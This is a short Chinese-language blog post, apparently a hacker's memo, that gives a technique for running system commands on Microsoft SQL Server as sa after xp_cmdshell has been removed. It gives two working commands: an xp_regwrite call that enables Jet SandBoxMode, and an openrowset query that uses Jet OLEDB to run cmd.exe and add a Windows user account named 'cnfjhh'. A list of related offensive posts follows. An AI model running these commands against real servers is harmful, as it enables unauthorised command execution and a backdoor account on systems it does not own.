Chinadu's Blog

sa下删除xp_cmdshell和xplog70.dll时候的一种办法，不算新的了，
也被一些人不断的再次提出来，
为了方便自己记忆再写出来，
在这种情况下，要执行命令，条件是要有xp_regwrite。

首先开启沙盘模式：

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1


然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')


相关文章

• 2012年01月31日 -- 命令行导出IIS配置信息
• 2011年11月24日 -- 域内指定用户中马
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2010年08月26日 -- xp_hello.dll(sa) 提权
• 2010年05月5日 -- 搞内网的一个小技巧
• 2010年04月22日 -- 更改windows2003最大连接数
• 2010年03月1日 -- 让千千静听不再弹出广告
• 2010年01月19日 -- 手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】
• 2009年11月5日 -- MySQL导入数据库文件最大限制2048KB的修改解决办法